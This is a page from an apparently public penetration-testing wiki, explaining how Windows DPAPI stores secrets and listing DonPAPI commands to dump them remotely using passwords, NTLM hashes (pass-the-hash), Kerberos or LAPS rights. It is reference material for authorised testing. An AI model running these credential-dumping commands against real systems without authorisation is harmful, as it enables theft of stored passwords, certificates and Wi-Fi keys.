Pentest List Wiki
  • What is Pentest List Wiki?
  • OFFENSIVE SECURITY
    • External Infrastructure
      • Discovery
        • Email Address Discovery
        • Subdomain Discovery
        • Data Discovery
        • Port & Service Discovery
      • Exploitation
        • Password Spraying
        • Vulnerability Scanning
    • Internal Infrastructure
      • General Discovery
        • AD Attack Path Discovery
        • Port & Service Discovery
      • Credential Discovery
        • Passwords and NetNTLM
        • SAM & LSA secrets
        • NTDS.dit secrets
        • LSASS secrets
        • DCSync
        • DPAPI secrets
      • Movement
        • Credential Spraying
        • SMB Relaying
        • Pass The Hash
      • Infiltration/Exfiltration
        • Pivoting (Proxying)
    • Web Application
      • Discovery
        • Testing API Keys
        • Vulnerability Scan
        • Web Content Discovery
        • Parameter Discovery
        • VHOST Discovery
        • CMS Scanners
      • Exploitation
        • Authentication
          • Email Address Forms
          • AWS Cognito
        • JSON Web Tokens
        • Injection Attacks
          • SQL Injection
          • Cross-Site Scripting
          • HTTP Headers
      • Bypasses
        • Cloudflare Bypass
        • HTTP 403 Bypass
    • Mobile (iOS/Android)
      • iOS
        • IPA Decryption
        • Filesystem Analysis
        • Static Analysis
    • Cloud
      • AWS
        • Vulnerability Scanners
        • S3 Buckets
      • Azure
        • Vulnerability Scanners
        • m365 & Entra ID
  • DEFENSIVE SECURITY
    • Forged Kerberos Tickets
    • Logon Event Visualisation
Powered by GitBook
On this page
  • Overview
  • Remotely Dumping
  1. OFFENSIVE SECURITY
  2. Internal Infrastructure
  3. Credential Discovery

DPAPI secrets

How to find local user sensitive data.

PreviousDCSyncNextMovement

Last updated 11 months ago

Overview

Windows uses the DPAPI (Data Protection API) to store sensitive data for various applications, such as Outlook, Web browsers and more. Windows also uses DPAPI to store certificates, Wi-Fi credentials, etc.

The DPAPI data is secured by a user-specific master key and is stored within a users directory:

C:\Users\<USER>\AppData\Roaming\Microsoft\Protect<SUID_GUID>

Remotely Dumping

The DPAPI can be dumped remotely using DonPapi. However, a users password is required.

Dump all secrets using a domain administrator account (requires local administrator):

DonPAPI <domain>/<user>:<password>@<target>

Dump all secrets using a local administrator account:

DonPAPI -local_auth <user>@<target>

Dump secrets using a users password hash (Pass-The-Hash attack):

DonPAPI --hashes <LM>:<NT> <domain>/<user>@<target>

Dump secrets using kerberos:

DonPAPI -k <domain>/<user>@<target>

Dump secrets using a user with LAPS password reading rights:

DonPAPI -laps <domain>/<user>:<password>@<target>
https://github.com/login-securite/DonPAPI